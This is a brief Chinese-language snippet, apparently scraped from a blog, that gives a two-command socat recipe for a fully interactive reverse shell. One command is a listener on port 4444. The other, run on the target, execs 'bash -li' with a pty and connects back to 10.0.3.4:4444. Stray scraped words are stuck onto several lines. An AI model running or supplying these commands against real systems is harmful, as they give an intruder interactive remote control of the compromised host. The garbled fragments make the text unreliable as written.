下載socatshell
在客戶端:bash
socat file:`tty`,raw,echo=0 tcp-listen:4444 tcp
在服務端:spa
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 file
如此便可建立功能徹底的反向shell下載